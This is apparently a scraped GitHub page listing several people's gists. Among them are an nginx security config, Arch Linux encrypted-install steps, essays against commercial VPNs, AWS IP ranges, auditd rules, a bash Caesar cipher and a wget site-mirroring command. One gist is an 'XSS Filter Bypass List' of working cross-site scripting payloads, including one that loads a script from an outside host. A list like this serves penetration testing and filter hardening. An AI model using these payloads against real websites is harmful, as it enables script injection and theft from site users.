Skip to content

Instantly share code, notes, and snippets.

Atavic

Block or report user

Report or block Atavic

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@plentz
plentz / nginx.conf
Last active Jan 23, 2020
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active Jan 23, 2020
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@mattiaslundberg
mattiaslundberg / arch-linux-install
Last active Jan 23, 2020
Minimal instructions for installing arch linux on an UEFI system with full system encryption using dm-crypt and luks
View arch-linux-install
# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.
# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux
# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.
# Set swedish keymap
@joepie91
joepie91 / vpn.md
Last active Jan 23, 2020
Don't use VPN services.
View vpn.md

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin. There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

Why not?

View ip-ranges.json
{
"syncToken": "1579761790",
"createDate": "2020-01-23-06-43-10",
"prefixes": [
{
"ip_prefix": "13.248.118.0/24",
"region": "eu-west-1",
"service": "AMAZON"
},
{
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active Jan 23, 2020
HowTo: Privacy & Security Conscious Browsing
View gist:3425484ac5cce5298932

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@IQAndreas
IQAndreas / caesar-cipher.sh
Last active Jan 22, 2020
A really simple Caesar Cipher in Bash (or Shell) using `tr`, can also easily be adjusted to encrypt/decrypt ROT13 instead.
View caesar-cipher.sh
# Caesar cipher encoding
echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | tr '[A-Z]' '[X-ZA-W]'
# output: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD
# Caesar cipher decoding
echo "QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD" | tr '[X-ZA-W]' '[A-Z]'
# output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
# Can also be adjusted to ROT13 instead
@Neo23x0
Neo23x0 / audit.rules
Last active Jan 22, 2020
Linux Auditd Best Practice Configuration
View audit.rules
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
@kennwhite
kennwhite / vpn_psk_bingo.md
Last active Jan 22, 2020
Most VPN Services are Terrible
View vpn_psk_bingo.md

Most VPN Services are Terrible

Short version: I strongly do not recommend using any of these providers. You are, of course, free to use whatever you like. My TL;DR advice: Roll your own and use Algo or Streisand. For messaging & voice, use Signal. For increased anonymity, use Tor for desktop (though recognize that doing so may actually put you at greater risk), and Onion Browser for mobile.

This mini-rant came on the heels of an interesting twitter discussion: https://twitter.com/kennwhite/status/591074055018582016

@mikecrittenden
mikecrittenden / wget.sh
Last active Jan 20, 2020
Download an entire website with wget, along with assets.
View wget.sh
# One liner
wget --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --domains yoursite.com --no-parent yoursite.com
# Explained
wget \
--recursive \ # Download the whole site.
--page-requisites \ # Get all assets/elements (CSS/JS/images).
--adjust-extension \ # Save files with .html on the end.
--span-hosts \ # Include necessary assets from offsite as well.
--convert-links \ # Update links to still work in the static version.
You can’t perform that action at this time.